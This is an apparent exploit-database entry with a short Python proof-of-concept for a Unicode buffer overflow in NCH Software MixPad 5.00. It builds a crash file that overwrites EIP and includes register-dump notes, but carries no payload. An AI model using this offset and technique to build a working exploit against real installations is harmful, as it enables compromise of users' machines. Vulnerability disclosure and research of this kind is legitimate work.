MixPad 5.00 - Buffer Overflow
Source: @bzyo_ Author: bzyo Published: 2018-01-24
#!/usr/bin/python
 
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: NCH Software MixPad v5.00 - Unicode Buffer Overflow
# Date: 21-01-2017
# Vulnerable Software: NCH Software MixPad
# Vendor Homepage: http://www.nch.com.au/mixpad
# Version: v5.00
# Software Link: http://www.nch.com.au/mixpad/mpsetup.exe
# Tested On: Windows XP
#
#
# PoC: generate crash.txt, options, metronome tab, paste crash.txt in 'choose a custom metronome sound'
#
# no unicode jmp/call to esp
#
# EAX 00117700
# ECX 001167F0
# EDX 7C90E514 ntdll.KiFastSystemCallRet
# EBX 00000000
# ESP 00116C40 UNICODE "BBBBBB does not exist or cannot be accessed."
# EBP 00116FAC
# ESI 0000004E
# EDI 00117740
# EIP 00CC00CC
 
filename="crash.txt"
 
junk = "A"*251
eip = "\xcc"*2              #eip over; jmp/call esp goes here
fill = "B"*100              #only 6 used in esp
buffer = junk + eip + fill
 
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
 